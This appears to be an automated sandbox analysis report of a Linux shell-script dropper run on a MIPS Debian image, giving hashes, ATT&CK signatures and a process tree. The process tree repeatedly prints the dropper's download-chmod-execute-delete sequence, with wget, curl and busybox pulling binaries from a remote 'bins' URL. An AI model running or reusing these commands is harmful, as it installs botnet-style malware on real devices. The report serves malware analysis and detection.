cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca

Analysis

max time kernel
97s
max time network
99s
platform
debian-9_mips
resource
debian9-mipsbe-20240418-en
resource tags

arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
20/11/2024, 03:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh
Size

10KB
MD5

d2c747dcc8c9570351230ba8dbcfe974
SHA1

210237a62286eb8633d853b4ac09156a5cfc1efc
SHA256

cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca
SHA512

ba3739d2c3d266c512f813a60c662491711281115ba28b7842c2755e9a5019cd3e72df99d9515a378978b736a6164b04fcfd1145b64d2f249288400bee8f026e
SSDEEP

96:YeOf6zUPjeNO+bLLnLWLHVH1HgXDveOtA83lF4ve5eRemxEIhb3RKcKgKSfHsLeA:6GFRC7hBgXDP9AGYhBgXDR

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
825	chmod
832	chmod
932	chmod
960	chmod
890	chmod
911	chmod
981	chmod
756	chmod
858	chmod
946	chmod
988	chmod
1002	chmod
883	chmod
904	chmod
939	chmod
953	chmod
974	chmod
739	chmod
777	chmod
813	chmod
918	chmod
749	chmod
876	chmod
897	chmod
967	chmod
995	chmod
1009	chmod
925	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
793	curl
844	curl
936	curl
938	busybox
752	wget
772	busybox
822	curl
872	curl
894	curl
896	busybox
903	busybox
924	busybox
744	wget
964	curl
971	curl
942	wget
917	busybox
980	busybox
887	curl
829	curl
837	wget
880	curl
908	curl
922	curl
949	wget
963	wget
748	busybox
973	busybox
931	busybox
977	wget
921	wget
879	wget
886	wget
957	curl
966	busybox
994	busybox
1001	busybox
1008	busybox
817	wget
736	busybox
970	wget
718	wget
759	wget
889	busybox
901	curl
914	wget
952	busybox
1006	curl
746	curl
1005	wget
893	wget
950	curl
987	busybox
991	wget
828	wget
755	busybox
783	wget
882	busybox
900	wget
915	curl
753	curl
935	wget
943	curl
999	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m	curl
File opened for modification	/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN	curl
File opened for modification	/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh	curl
File opened for modification	/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz	curl
File opened for modification	/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1	curl
File opened for modification	/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8	curl
File opened for modification	/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx	curl
File opened for modification	/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN	curl
File opened for modification	/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1	curl
File opened for modification	/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4	curl
File opened for modification	/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx	curl
File opened for modification	/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx	curl
File opened for modification	/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa	curl
File opened for modification	/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m	curl
File opened for modification	/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS	curl
File opened for modification	/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4	curl
File opened for modification	/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh	curl
File opened for modification	/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG	curl
File opened for modification	/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG	curl
File opened for modification	/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8	curl
File opened for modification	/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz	curl
File opened for modification	/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx	curl
File opened for modification	/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa	curl
File opened for modification	/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT	curl
File opened for modification	/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS	curl
File opened for modification	/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx	curl
File opened for modification	/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT	curl
File opened for modification	/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx	curl

/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh
/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh
1⤵
PID:709
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:713
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - System Network Configuration Discovery
  PID:718
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:727
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - System Network Configuration Discovery
  PID:736
- /bin/chmod
  chmod 777 WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - File and Directory Permissions Modification
  PID:739
- /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  ./WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - Executes dropped EXE
  PID:740
- /bin/rm
  rm WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  PID:743
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  - System Network Configuration Discovery
  PID:744
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:746
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  - System Network Configuration Discovery
  PID:748
- /bin/chmod
  chmod 777 FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  - File and Directory Permissions Modification
  PID:749
- /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  ./FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  - Executes dropped EXE
  PID:750
- /bin/rm
  rm FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  PID:751
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  - System Network Configuration Discovery
  PID:752
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:753
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  - System Network Configuration Discovery
  PID:755
- /bin/chmod
  chmod 777 JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  - File and Directory Permissions Modification
  PID:756
- /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  ./JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  - Executes dropped EXE
  PID:757
- /bin/rm
  rm JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  PID:758
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  - System Network Configuration Discovery
  PID:759
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:764
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  - System Network Configuration Discovery
  PID:772
- /bin/chmod
  chmod 777 BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  - File and Directory Permissions Modification
  PID:777
- /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  ./BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  - Executes dropped EXE
  PID:779
- /bin/rm
  rm BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  PID:781
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - System Network Configuration Discovery
  PID:783
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:793
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  PID:806
- /bin/chmod
  chmod 777 tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - File and Directory Permissions Modification
  PID:813
- /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  ./tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - Executes dropped EXE
  PID:814
- /bin/rm
  rm tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  PID:816
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  - System Network Configuration Discovery
  PID:817
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:822
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  PID:824
- /bin/chmod
  chmod 777 idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  - File and Directory Permissions Modification
  PID:825
- /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  ./idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  - Executes dropped EXE
  PID:826
- /bin/rm
  rm idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  PID:827
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  - System Network Configuration Discovery
  PID:828
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:829
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  PID:831
- /bin/chmod
  chmod 777 mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  - File and Directory Permissions Modification
  PID:832
- /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  ./mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  - Executes dropped EXE
  PID:833
- /bin/rm
  rm mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  PID:836
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - System Network Configuration Discovery
  PID:837
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:844
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  PID:855
- /bin/chmod
  chmod 777 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - File and Directory Permissions Modification
  PID:858
- /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  ./4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - Executes dropped EXE
  PID:860
- /bin/rm
  rm 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  PID:863
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  PID:864
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:872
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  PID:875
- /bin/chmod
  chmod 777 DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  - File and Directory Permissions Modification
  PID:876
- /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  ./DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  - Executes dropped EXE
  PID:877
- /bin/rm
  rm DQul2qKd09ITKkHJpETty8DirCA07F1nBT
  2⤵
  PID:878
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  - System Network Configuration Discovery
  PID:879
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:880
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  - System Network Configuration Discovery
  PID:882
- /bin/chmod
  chmod 777 teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  - File and Directory Permissions Modification
  PID:883
- /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  ./teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  - Executes dropped EXE
  PID:884
- /bin/rm
  rm teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
  2⤵
  PID:885
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - System Network Configuration Discovery
  PID:886
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:887
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - System Network Configuration Discovery
  PID:889
- /bin/chmod
  chmod 777 PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - File and Directory Permissions Modification
  PID:890
- /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  ./PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  - Executes dropped EXE
  PID:891
- /bin/rm
  rm PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
  2⤵
  PID:892
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - System Network Configuration Discovery
  PID:893
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:894
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - System Network Configuration Discovery
  PID:896
- /bin/chmod
  chmod 777 ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - File and Directory Permissions Modification
  PID:897
- /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  ./ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  - Executes dropped EXE
  PID:898
- /bin/rm
  rm ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
  2⤵
  PID:899
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - System Network Configuration Discovery
  PID:900
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:901
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - System Network Configuration Discovery
  PID:903
- /bin/chmod
  chmod 777 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - File and Directory Permissions Modification
  PID:904
- /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  ./2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  - Executes dropped EXE
  PID:905
- /bin/rm
  rm 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
  2⤵
  PID:906
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  PID:907
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:908
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  PID:910
- /bin/chmod
  chmod 777 zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  - File and Directory Permissions Modification
  PID:911
- /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  ./zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  - Executes dropped EXE
  PID:912
- /bin/rm
  rm zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
  2⤵
  PID:913
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  - System Network Configuration Discovery
  PID:914
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:915
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  - System Network Configuration Discovery
  PID:917
- /bin/chmod
  chmod 777 mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  - File and Directory Permissions Modification
  PID:918
- /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  ./mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  - Executes dropped EXE
  PID:919
- /bin/rm
  rm mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1
  2⤵
  PID:920
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - System Network Configuration Discovery
  PID:921
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:922
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - System Network Configuration Discovery
  PID:924
- /bin/chmod
  chmod 777 WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - File and Directory Permissions Modification
  PID:925
- /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  ./WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  - Executes dropped EXE
  PID:926
- /bin/rm
  rm WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
  2⤵
  PID:927
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  PID:928
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:929
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  - System Network Configuration Discovery
  PID:931
- /bin/chmod
  chmod 777 FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  - File and Directory Permissions Modification
  PID:932
- /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  ./FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  - Executes dropped EXE
  PID:933
- /bin/rm
  rm FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx
  2⤵
  PID:934
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  - System Network Configuration Discovery
  PID:935
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:936
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  - System Network Configuration Discovery
  PID:938
- /bin/chmod
  chmod 777 JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  - File and Directory Permissions Modification
  PID:939
- /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  ./JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  - Executes dropped EXE
  PID:940
- /bin/rm
  rm JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
  2⤵
  PID:941
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  - System Network Configuration Discovery
  PID:942
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:943
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  PID:945
- /bin/chmod
  chmod 777 BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  - File and Directory Permissions Modification
  PID:946
- /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  ./BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  - Executes dropped EXE
  PID:947
- /bin/rm
  rm BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
  2⤵
  PID:948
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - System Network Configuration Discovery
  PID:949
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:950
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - System Network Configuration Discovery
  PID:952
- /bin/chmod
  chmod 777 tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - File and Directory Permissions Modification
  PID:953
- /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  ./tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  - Executes dropped EXE
  PID:954
- /bin/rm
  rm tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
  2⤵
  PID:955
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  PID:956
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:957
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  PID:959
- /bin/chmod
  chmod 777 idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  - File and Directory Permissions Modification
  PID:960
- /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  ./idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  - Executes dropped EXE
  PID:961
- /bin/rm
  rm idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
  2⤵
  PID:962
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - System Network Configuration Discovery
  PID:963
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:964
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - System Network Configuration Discovery
  PID:966
- /bin/chmod
  chmod 777 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
  2⤵
  - File and Directory Permissions Modification
  PID:967
